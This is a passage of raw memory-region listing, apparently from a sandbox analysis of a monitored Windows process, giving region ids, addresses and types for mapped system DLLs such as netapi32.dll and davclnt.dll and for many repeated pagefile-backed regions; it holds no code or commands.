start_va = 0x1ec0000 end_va = 0x1ec0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 2319 start_va = 0x2970000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 2320 start_va = 0x2d10000 end_va = 0x2d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 2321 start_va = 0x3030000 end_va = 0x312ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2322 start_va = 0x3130000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 2323 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2324 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2325 start_va = 0x74910000 end_va = 0x74917fff monitored = 0 entry_point = 0x74911356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 2326 start_va = 0x74d40000 end_va = 0x74d68fff monitored = 0 entry_point = 0x74d46b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2327 start_va = 0x74610000 end_va = 0x74623fff monitored = 0 entry_point = 0x746115c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 2328 start_va = 0x745f0000 end_va = 0x74606fff monitored = 0 entry_point = 0x745f1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 2329 start_va = 0x745e0000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745e3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 2330 start_va = 0x745d0000 end_va = 0x745defff monitored = 0 entry_point = 0x745d12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 2331 start_va = 0x745c0000 end_va = 0x745cafff monitored = 0 entry_point = 0x745c1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 2332 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2333 start_va = 0x745a0000 end_va = 0x745acfff monitored = 0 entry_point = 0x745a12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 2334 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2335 start_va = 0x2930000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 2336 start_va = 0x74580000 end_va = 0x74590fff monitored = 0 entry_point = 0x74581300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2337 start_va = 0x74560000 end_va = 0x74578fff monitored = 0 entry_point = 0x74561319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2338 start_va = 0x1ed0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 2339 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2340 start_va = 0x3640000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003640000" filename = "" Region: id = 2341 start_va = 0x29b0000 end_va = 0x29c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029b0000" filename = "" Region: id = 2342 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2343 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2344 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2345 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2346 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2347 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2348 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2349 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2350 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2351 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2352 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2353 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2354 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2355 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2356 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2357 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2358 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2359 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2360 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2361 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2362 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2363 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2364 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2365 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2366 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2367 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2368 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2369 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2370 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2371 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2372 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2373 start_va = 0x3230000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 2374 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2375 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2376 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2377 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2378 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2379 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2380 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2381 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2382 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2383 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2384 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2385 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2386 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2387 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2388 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2389 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2390 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2391 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2392 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2393 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2394 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2395 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2396 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2397 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2398 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2399 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2400 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2401 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2402 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2403 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2404 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2405 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2406 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2407 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2408 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2409 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2410 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2411 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2412 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2413 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2414 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2415 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2416 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2417 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2418 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2419 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2420 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2421 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2422 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2423 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2424 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2425 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2426 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2427 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2428 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2429 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2430 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2431 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2432 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2433 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2434 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2435 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2436 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2437 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2438 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2439 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2440 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2441 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2442 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2443 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2444 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2445 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2446 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2447 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2448 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2449 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2450 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2451 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2452 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2453 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2454 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2455 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2456 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2457 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2458 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2459 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2460 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2461 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2462 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2463 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2464 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2465 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2466 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2467 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2468 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2469 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2470 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2471 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2472 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2473 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2474 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2475 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2476 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2477 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2478 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2479 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2480 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2481 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2482 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2483 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2484 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2485 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2486 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2487 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2488 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 